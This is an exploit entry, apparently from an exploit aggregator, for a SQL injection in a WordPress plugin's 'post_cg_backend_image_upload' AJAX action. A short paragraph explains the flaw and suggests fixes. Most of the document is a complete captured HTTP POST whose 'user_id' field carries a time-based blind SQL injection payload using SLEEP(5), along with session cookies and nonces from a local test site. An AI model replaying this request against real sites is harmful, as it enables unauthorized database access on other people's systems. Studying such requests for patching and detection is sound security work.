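## https://sploitus.com/exploit?id=WPEX-ID:254F6E8B-5FA9-4D6D-8E0E-1A4CAE18AEE0

The captured request below is an authenticated multipart POST (session cookie for the `test1` account) to `admin-ajax.php` with `action=post_cg_backend_image_upload`. Its final `user_id` field carries a time-based blind SQL injection probe (`SLEEP(5)`), whereas the sibling fields `checkuser_id` and `cg_user_id` hold the plain integer `3`. This suggests the handler places `user_id` into a SQL query without casting it to an integer or binding it as a parameter. On the defensive side, the handler should coerce the value with `absint()` and build the query through `$wpdb->prepare()`. Requests to this action whose `user_id` is not purely numeric are worth alerting on in web server or WAF logs.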
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/profile.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------5167035403431582548369588705
Content-Length: 2816
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=test1%7C1668471291%7C7VPhYIeBdCjIP9uW8VoyQrGPufCvPRRf5M9OXWus6HS%7C92b6fd388ba13304a4e6d05bb993994b73e939c69f835a5f48832fd667db6a41; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=test1%7C1668471291%7C7VPhYIeBdCjIP9uW8VoyQrGPufCvPRRf5M9OXWus6HS%7C4a47ea962cf6ef424f4c85c035f566bcefb106dac5c9061bff96ab380af53d60; wp-settings-time-3=1668298491
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="_wpnonce"

5c8402bea9
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="cg_input_image_upload_file_to_delete_wp_id"

1
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/profile.php
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="from"

profile
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="checkuser_id"

3
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="color-nonce"

6f0655e068
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="admin_color"

fresh
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="admin_bar_front"

1
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="first_name"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="last_name"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="nickname"

test1
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="display_name"

test1
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="email"

test1@c.com
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="url"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="description"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="pass1"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="pass2"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="cg_user_data_available"

true
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="cg_user_id"

3
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="action"

post_cg_backend_image_upload
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="cg_input_image_upload_file[]"; filename="index.png"
Content-Type: text/plain

TEST
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="user_id"

3 AND (SELECT 6037 FROM (SELECT(SLEEP(5)))Uiuu)
-----------------------------5167035403431582548369588705--